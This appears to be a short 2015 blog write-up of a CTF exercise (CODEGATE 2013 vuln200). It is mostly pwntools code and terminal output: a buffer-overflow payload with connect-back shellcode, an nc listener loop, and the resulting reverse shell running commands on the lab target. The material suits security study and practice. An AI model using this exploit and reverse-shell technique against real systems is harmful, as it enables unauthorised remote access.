codegate_quals vuln200

======================= try 1 =======================

from pwn import *

r=remote('192.168.1.104',7777)

>>> r=remote('192.168.1.104',7777)
[x] Opening connection to 192.168.1.104 on port 7777
[x] Opening connection to 192.168.1.104 on port 7777: Trying 192.168.1.104
[+] Opening connection to 192.168.1.104 on port 7777: Done
>>> print(r.recv(1024))
CODEGATE 2013 Util service!
[*] md5
[*] help
[*] base64 encode
[*] base64 decode
[*] quit
>>> r.send('write' + (asm(shellcraft.i386.linux.connect('192.168.1.109',7777)).ljust(0xf0, '\x90')+p32(0xbfdf18cc)))

Listener on the attacking host:

# strace -f nc -l -p 7777

......

bind(3, {sa_family=AF_INET, sin_port=htons(7777), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 1)                            = 0
rt_sigaction(SIGALRM, {SIG_IGN, [ALRM], SA_RESTORER|SA_RESTART, 0x7fc9a4d1f180}, {SIG_DFL, [], 0}, 8) = 0
alarm(0)                                = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
accept(3, {sa_family=AF_INET, sin_port=htons(50967), sin_addr=inet_addr("192.168.1.104")}, [16]) = 4

......

======================= try 2 =======================

Attacker side:

r.close()
r=remote('192.168.1.104',7777)
print(r.recv(1024))
r.send('write' + (asm(shellcraft.i386.linux.connect('192.168.1.109',7777)+shellcraft.i386.linux.dupsh(sock='ebp'))).ljust(0xf0, '\x90')+p32(0xbfdf18cc))

Reverse shell:

# while [ 1 ];do nc -n -vv -l -p 7777;done
listening on [any] 7777 ...
connect to [192.168.1.109] from (UNKNOWN) [192.168.1.104] 50969
ls
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
pwd
/opt/ctf/pwn/pwntools-write-ups-master/2013/codegate-quals/vuln200
ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:24:54:7b:d2:d9 
          inet addr:192.168.1.104  Bcast:192.168.1.255  Mask:255.255.255.0

......

posted @ 2015-12-15 21:50  scoder